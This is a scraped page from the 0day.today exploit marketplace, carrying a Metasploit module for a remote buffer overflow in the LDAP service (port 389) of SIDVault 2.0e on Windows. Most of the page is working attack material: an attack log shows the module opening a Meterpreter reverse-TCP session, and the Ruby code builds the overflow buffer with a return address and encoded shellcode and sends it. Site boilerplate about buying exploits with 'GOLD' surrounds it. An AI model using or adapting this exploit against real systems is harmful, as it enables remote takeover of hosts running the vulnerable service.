0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta)
=========================================================== SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta) =========================================================== #--attack-log-- #attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E #[*] Please wait while we load the module tree... #[*] Handler binding to LHOST 0.0.0.0 #[*] Started reverse handler #[*] Sending stage (718336 bytes) #[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076) #meterpreter > ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'SIDVault 2.0e Windows Remote Buffer Overflow', 'Description' => %q{ This exploits a buffer overflow in the LDAP service that is part of the SIDVault product. This module was tested against version 2.0e. }, 'Author' => [ 'His0k4 <his0k4.hlm[at]gmail.com>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.milw0rm.com/exploits/9586'], ], 'Privileged' => true, 'Payload' => { 'Space' => 750, 'BadChars' => "\x00", 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ #Tested against xp_sp3 OK ["Universal", { 'Ret' => "\x29\x10\x40" }], #p/p/r sidvault.exe ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(389) ], self.class) end def exploit connect sploit = "\x30\x82\x12\x10\x02\x01\x01\x60\x82\x12\x09\x02\x01\x03\x04\x82\x10\xfe" sploit << "dc=" sploit << rand_text_alpha(1028) sploit << payload.encoded sploit << rand_text_alpha(3302 - payload.encoded.length) sploit << "\xE8\x15\xF3\xFF\xFF" sploit << make_nops(5) sploit << "\xEB\xF4\x90\x90" sploit << target.ret sploit << "\x80\x82\x01\x00" sploit << rand_text_alpha(500) sock.put(sploit) handler end end # 0day.today [2024-11-16] #